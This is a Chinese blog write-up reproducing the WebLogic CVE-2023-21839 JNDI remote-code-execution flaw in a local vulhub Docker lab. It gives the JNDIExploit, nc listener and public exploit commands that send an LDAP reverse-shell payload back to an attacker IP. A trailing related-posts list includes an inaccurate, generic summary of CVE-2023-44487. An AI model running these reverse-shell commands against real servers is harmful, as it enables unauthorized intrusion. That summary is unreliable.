CVE-2023-21839漏洞本地简单复现

原创 已于 2023-03-15 14:31:28 修改 · 7k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #乌鸦安全 #Weblogic #CVE-2023-21839 #攻防

于 2023-02-27 18:26:40 首次发布
本文详细介绍了如何在本地环境中复现CVE-2023-21839漏洞,利用不同工具进行未授权的JNDIlookup操作,尝试实现远程代码执行。通过Docker部署Weblogic漏洞环境,然后使用不同开源工具进行测试,最终成功实现RCE并获取反弹shell。文中还提到了在Windows环境下工具的使用情况。

image.png

1. 说明

本文漏洞环境由vulhub下载后在本地部署:https://github.com/vulhub
本文漏洞利用工具1来源于:https://github.com/DXask88MA/Weblogic-CVE-2023-21839(可能是我利用姿势不太对,没成功)
本文漏洞利用工具2来源于:https://github.com/4ra1n/CVE-2023-21839
本文漏洞利用工具3来源于:https://github.com/WhiteHSBG/JNDIExploit

我主要是对漏洞进行了本地的简单复现,其中用到的工具都是各位大神的,我对4ra1n给的工具进行了编译。

2. 漏洞复现

2.1 漏洞原理

CVE-2023-21839 允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致RCE漏洞。
以上来源于:

https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2023-21839/README.zh-cn.md

2.2 环境搭建

下载之后在本地使用docker部署:

docker-compose up -d

image.png

访问本地:http://127.0.0.1:7001/,出现以下界面证明环境搭建成功:
image.png

然后访问:http://127.0.0.1:7001/console/,等待几秒之后,即可访问到后台管理登录界面。
image.png

使用原来的Weblogic漏洞RCE神器进行测试,偶然发现存在cve-2016-3510

image.png

2.3 漏洞复现-失败

攻击机kali : 192.168.135.22java11
目标机:10.30.0.214mac启动的dockerjava8
中转文件:JNDIExploit-1.4-SNAPSHOT.jar
kali上同时启动监听、命令执行、反弹shell的工作,先监听:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 10.30.0.214

image.png

然后在本地开启监听:

nc -lvnp 7777

image.png

使用下面的工具进行测试:

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

命令(要记得使用java8的环境,不然会报错):

java -jar Weblogic-CVE-2023-21839.jar 10.30.0.214:7001 ldap://192.168.135.22:1389/Basic/ReverseShell/192.168.135.22/7777


[*]java -jar 目标ip:端口 ldap地址
java -jar Weblogic-CVE-2023-21839.jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111

通过多次测试,发现还是有问题,能执行但是回不来:
可能是姿势不太对。。。
image.png
因为时间关系,暂时就不测试了。

2.4 漏洞复现2-成功

攻击机kali : 192.168.135.22java11
目标机:10.30.0.214mac启动的dockerjava8
中转文件:JNDIExploit-1.4-SNAPSHOT.jar
首先在kali上设置监听,用于接收反弹的shell
image.png

再通过kali上来设置监听:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.135.22

image.png

最后使用工具来进行攻击测试,使用工具来源于:https://github.com/4ra1n/CVE-2023-21839
将工具下载下来之后,在有go的环境中编译一下:

cd cmd
go build -o CVE-2023-21839

image.png

使用的时候,按照作者的方法来执行:

./CVE-2023-21839 -ip 10.30.0.214 -port 7001 -ldap ldap://192.168.135.22:1389/Basic/ReverseShell/192.168.135.22/7777
10.30.0.214为靶机
192.168.22.105为攻击机,也是接收反弹shell的ip

image.png

漏洞复现之后,记得及时关闭环境:
image.png

2.5 windows下工具使用

在这里使用windows版本的试下:
image.png

image.png

同样可以成功。

CVE-2023-21839Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 5470
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
winrar(CVE-2023-38831)漏洞分析
4SecNet团队专栏
09-28 1348
WinRAR 是一种流行的文件归档程序,全世界有数百万人使用。它可以创建和查看 RAR 或 ZIP 文件格式的存档,并解压多种存档文件格式。WinRAR 支持创建加密、多部分和自解压存档。WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码。
漏洞复现Weblogic CVE-2023-21839
zg_111的博客
03-23 7658
Weblogic CVE-2023-21839漏洞复现
CVE-2023-21839漏洞复现(基于vulhub)
weixin_63960760的博客
09-11 1863
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
Oracle WebLogic Server Core 安全漏洞CVE-2023-21839复现
2301_77132421的博客
07-08 1461
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 4459
CVE-2023-21839漏洞复现
Weblogic远程代码执行漏洞CVE-2023-21839)复现
yunshang_secure的博客
12-23 4047
复现过程中,会出现各种各样报错,小伙伴多找网上文章解决,本文仅作参考。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
热门推荐
网络空间安全学习
09-19 1万+
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628CVE-2023-21839复现)
m0_54850303的博客
12-19 1266
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
漏洞复现-Weblogic远程代码执行漏洞(CVE-2023-21839)
玄道的网安博客
08-13 762
ForeignOpaqueReference继承自OpaqueReference,前面说过,当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。远程对象继承OpaqueReference时,该对象进行JNDI查找并获取时,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的。
CVE-2023-38831 漏洞复现:win10 压缩包挂马攻击剖析
xinyaoyaotu的博客
01-27 2719
在网络安全这片没有硝烟的战场上,新型漏洞如同隐匿的暗箭,时刻威胁着我们的数字生活。其中,CVE - 2023 - 38831 这个关联 Win10 压缩包挂马攻击的漏洞,自曝光以来便引发了安全界的高度关注。深入探究并复现这一漏洞,不仅能让我们洞悉攻击者的手段,更能助力我们筑牢防线,抵御此类威胁。CVE - 2023 - 38831 是 2023 年披露的一个高危安全漏洞,主要影响 Windows 10 系统。攻击者利用这一漏洞,精心炮制恶意压缩包。
GeoServer SQL 注入漏洞复现CVE-2023-25157)附poc
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
12-23 8808
GeoServer是OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作,通过 GeoServer 可以比较容易的在用户之间迅速共享空间地理信息。在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入,执行恶意代码。
复现CVE-2023-21839
Coder的博客
05-02 2039
下载jdk1.8或#创建java文件夹#解压后更改文件夹名字为 jdk1.8.0.372#将文件夹移动到/usr/local/java目录下验证是否安装成功javac如有提示,安装完成。
weblogic-cve-2023-21839漏洞复现-kali
gasdfjjdjdjrje_的博客
09-04 670
CVE-2023-21839 是 Oracle WebLogic Server 中 T3 协议的漏洞。T3 协议是一种用于 Java 对象的远程方法调用(RMI)的内部协议,通常用于服务器间通信和客户端与服务器的交互。攻击者利用该漏洞可以发送恶意的序列化数据,导致服务器在处理数据时执行任意代码。由于 WebLogic 支持通过 T3 协议远程访问,这使得此漏洞极其危险,因为攻击者无需身份验证即可远程触发。
Weblogic远程代码执行漏洞CVE-2023-21839复现/保姆级讲解
BGiscool的博客
02-28 5064
由于WeblogicIIOP/T3协议存在缺陷,当IIOP/T3协议开启时,未经身份验证的攻击者通过IIOP/T3协议向受影响的服务器发送恶意的请求,最终导致在目标服务器上访问敏感信息并执行任意代码。
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 2152
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
CVE-2023-27253-pfsense命令注入漏洞复现(含exp)
zwy15288408160的博客
09-29 4002
NetGate Pfsense
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
xsharkrasp的博客
05-18 759
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。发起攻击请求:新建/tmp/1.txt文件。
weblogic CVE-2023-21839 复现
m0_65096687的博客
05-25 866
1.使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听 (JNDIExploit-1.2-SNAPSHOT.jar自己下载移动到攻击机。这里是用的docker下载的vulhub的CVE-2023-21839。这里需要go语言进行编译 go版本大于1.19。靶机和攻击机都是192.168.85.131。让你访问ip:7001/console。2.nc开监听反弹shell。nc上反弹了一个shell。docker 启动环境。
CVE-2023-44487复现
最新发布
07-03
CVE-2023-44487 是一个影响广泛使用的软件组件的漏洞,具体涉及 HTTP/2 协议实现中的缺陷。该漏洞允许远程攻击者通过发送特制的 HTTP/2 请求导致服务崩溃或执行任意代码。以下是对该漏洞复现步骤、测试环境搭建方法以及影响范围的技术分析。 ### 漏洞复现步骤 为了复现 CVE-2023-44487 漏洞,通常需要构造特定的 HTTP/2 请求来触发目标系统中的漏洞点。以下是典型的复现流程: 1. **准备测试环境**:确保目标服务器运行的是受影响版本的 HTTP/2 实现库(如 nghttp2 或其他相关库)。 2. **构造恶意请求**:使用支持 HTTP/2 的客户端工具(如 `nghttp` 或自定义脚本)构造包含特殊字段的 HTTP/2 请求。 3. **发送请求并观察响应**:向目标服务器发送构造好的请求,并监控服务器的行为变化,例如是否出现异常、崩溃或返回预期之外的结果。 示例代码如下,展示了如何使用 Python 和 `hyper` 库发送 HTTP/2 请求: ```python from hyper import HTTP20Connection # 创建连接 conn = HTTP20Connection('target.example.com', port=443, secure=True) # 发送 GET 请求 conn.request('GET', '/') # 获取响应 resp = conn.get_response() print(resp.status) print(resp.read()) ``` 若目标存在漏洞且被成功触发,可能会观察到服务中断或其他非正常行为。 ### 测试环境搭建 为了搭建用于复现 CVE-2023-44487 的测试环境,可以按照以下步骤操作: 1. **选择受影响的服务端实现**:安装使用了易受攻击版本的 HTTP/2 服务器软件,例如基于 nghttp2 的服务器。 2. **配置 HTTPS 支持**:由于 HTTP/2 通常要求 TLS 加密,因此需为服务器配置有效的 SSL/TLS 证书。 3. **部署测试站点**:设置一个简单Web 站点以供测试,确保可以通过 HTTP/2 协议访问。 4. **启用调试日志**:开启服务器的详细日志记录功能以便于分析漏洞触发过程中的行为。 对于具体的 nghttp2 服务器部署,可以从其官方网站下载源码并编译安装: ```bash git clone https://github.com/nghttp2/nghttp2 cd nghttp2 autoreconf -i ./configure --enable-app make sudo make install ``` 之后,使用提供的示例程序启动一个本地测试服务器。 ### 影响范围 CVE-2023-44487 主要影响那些依赖 HTTP/2 协议栈进行通信的应用和服务。具体而言,所有未打补丁且使用了存在此漏洞的 HTTP/2 实现的系统均可能受到影响。这包括但不限于: - 使用 nghttp2 库的服务器和客户端应用; - 基于 gRPC 的微服务架构; - 利用 HTTP/2 进行高效数据传输的现代 Web 服务。 此外,任何提供公共 API 接口并启用了 HTTP/2 的云服务平台也应评估自身风险,并及时更新至安全版本。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值